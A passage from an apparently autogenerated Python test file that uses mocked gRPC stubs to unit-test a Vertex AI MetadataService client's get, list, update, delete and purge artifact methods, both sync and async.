def test_get_artifact(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = artifact.Artifact(
name="name_value",
display_name="display_name_value",
uri="uri_value",
etag="etag_value",
state=artifact.Artifact.State.PENDING,
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.get_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, artifact.Artifact)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.uri == "uri_value"
assert response.etag == "etag_value"
assert response.state == artifact.Artifact.State.PENDING
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_get_artifact_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
client.get_artifact()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetArtifactRequest()
@pytest.mark.asyncio
async def test_get_artifact_async(
transport: str = "grpc_asyncio", request_type=metadata_service.GetArtifactRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
artifact.Artifact(
name="name_value",
display_name="display_name_value",
uri="uri_value",
etag="etag_value",
state=artifact.Artifact.State.PENDING,
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.get_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, artifact.Artifact)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.uri == "uri_value"
assert response.etag == "etag_value"
assert response.state == artifact.Artifact.State.PENDING
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_get_artifact_async_from_dict():
await test_get_artifact_async(request_type=dict)
def test_get_artifact_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetArtifactRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
call.return_value = artifact.Artifact()
client.get_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_artifact_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetArtifactRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(artifact.Artifact())
await client.get_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_get_artifact_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = artifact.Artifact()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_artifact(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_artifact_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_artifact(
metadata_service.GetArtifactRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_get_artifact_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = artifact.Artifact()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(artifact.Artifact())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_artifact(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_artifact_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_artifact(
metadata_service.GetArtifactRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.ListArtifactsRequest,
dict,
],
)
def test_list_artifacts(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListArtifactsResponse(
next_page_token="next_page_token_value",
)
response = client.list_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListArtifactsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListArtifactsPager)
assert response.next_page_token == "next_page_token_value"
def test_list_artifacts_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
client.list_artifacts()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListArtifactsRequest()
@pytest.mark.asyncio
async def test_list_artifacts_async(
transport: str = "grpc_asyncio", request_type=metadata_service.ListArtifactsRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListArtifactsResponse(
next_page_token="next_page_token_value",
)
)
response = await client.list_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListArtifactsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListArtifactsAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_artifacts_async_from_dict():
await test_list_artifacts_async(request_type=dict)
def test_list_artifacts_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListArtifactsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
call.return_value = metadata_service.ListArtifactsResponse()
client.list_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_artifacts_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListArtifactsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListArtifactsResponse()
)
await client.list_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_list_artifacts_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListArtifactsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_artifacts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_artifacts_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_artifacts(
metadata_service.ListArtifactsRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_artifacts_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListArtifactsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListArtifactsResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_artifacts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_artifacts_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_artifacts(
metadata_service.ListArtifactsRequest(),
parent="parent_value",
)
def test_list_artifacts_pager(transport_name: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials,
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
artifact.Artifact(),
],
next_page_token="abc",
),
metadata_service.ListArtifactsResponse(
artifacts=[],
next_page_token="def",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
],
next_page_token="ghi",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_artifacts(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, artifact.Artifact) for i in results)
def test_list_artifacts_pages(transport_name: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials,
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
artifact.Artifact(),
],
next_page_token="abc",
),
metadata_service.ListArtifactsResponse(
artifacts=[],
next_page_token="def",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
],
next_page_token="ghi",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
],
),
RuntimeError,
)
pages = list(client.list_artifacts(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_artifacts_async_pager():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_artifacts), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
artifact.Artifact(),
],
next_page_token="abc",
),
metadata_service.ListArtifactsResponse(
artifacts=[],
next_page_token="def",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
],
next_page_token="ghi",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
],
),
RuntimeError,
)
async_pager = await client.list_artifacts(
request={},
)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager: # pragma: no branch
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, artifact.Artifact) for i in responses)
@pytest.mark.asyncio
async def test_list_artifacts_async_pages():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_artifacts), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
artifact.Artifact(),
],
next_page_token="abc",
),
metadata_service.ListArtifactsResponse(
artifacts=[],
next_page_token="def",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
],
next_page_token="ghi",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
],
),
RuntimeError,
)
pages = []
async for page_ in (
await client.list_artifacts(request={})
).pages: # pragma: no branch
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize(
"request_type",
[
metadata_service.UpdateArtifactRequest,
dict,
],
)
def test_update_artifact(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_artifact.Artifact(
name="name_value",
display_name="display_name_value",
uri="uri_value",
etag="etag_value",
state=gca_artifact.Artifact.State.PENDING,
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.update_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_artifact.Artifact)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.uri == "uri_value"
assert response.etag == "etag_value"
assert response.state == gca_artifact.Artifact.State.PENDING
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_update_artifact_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
client.update_artifact()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateArtifactRequest()
@pytest.mark.asyncio
async def test_update_artifact_async(
transport: str = "grpc_asyncio", request_type=metadata_service.UpdateArtifactRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_artifact.Artifact(
name="name_value",
display_name="display_name_value",
uri="uri_value",
etag="etag_value",
state=gca_artifact.Artifact.State.PENDING,
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.update_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_artifact.Artifact)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.uri == "uri_value"
assert response.etag == "etag_value"
assert response.state == gca_artifact.Artifact.State.PENDING
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_update_artifact_async_from_dict():
await test_update_artifact_async(request_type=dict)
def test_update_artifact_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.UpdateArtifactRequest()
request.artifact.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
call.return_value = gca_artifact.Artifact()
client.update_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"artifact.name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_artifact_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.UpdateArtifactRequest()
request.artifact.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_artifact.Artifact()
)
await client.update_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"artifact.name=name_value",
) in kw["metadata"]
def test_update_artifact_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_artifact.Artifact()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_artifact(
artifact=gca_artifact.Artifact(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].artifact
mock_val = gca_artifact.Artifact(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
def test_update_artifact_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_artifact(
metadata_service.UpdateArtifactRequest(),
artifact=gca_artifact.Artifact(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_artifact_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_artifact.Artifact()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_artifact.Artifact()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_artifact(
artifact=gca_artifact.Artifact(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].artifact
mock_val = gca_artifact.Artifact(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
@pytest.mark.asyncio
async def test_update_artifact_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_artifact(
metadata_service.UpdateArtifactRequest(),
artifact=gca_artifact.Artifact(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.DeleteArtifactRequest,
dict,
],
)
def test_delete_artifact(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.delete_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_artifact_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
client.delete_artifact()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteArtifactRequest()
@pytest.mark.asyncio
async def test_delete_artifact_async(
transport: str = "grpc_asyncio", request_type=metadata_service.DeleteArtifactRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.delete_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_artifact_async_from_dict():
await test_delete_artifact_async(request_type=dict)
def test_delete_artifact_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteArtifactRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.delete_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_artifact_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteArtifactRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.delete_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_delete_artifact_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_artifact(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_artifact_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_artifact(
metadata_service.DeleteArtifactRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_delete_artifact_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_artifact(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_artifact_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_artifact(
metadata_service.DeleteArtifactRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.PurgeArtifactsRequest,
dict,
],
)
def test_purge_artifacts(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.purge_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeArtifactsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_purge_artifacts_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
client.purge_artifacts()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeArtifactsRequest()
@pytest.mark.asyncio
async def test_purge_artifacts_async(
transport: str = "grpc_asyncio", request_type=metadata_service.PurgeArtifactsRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
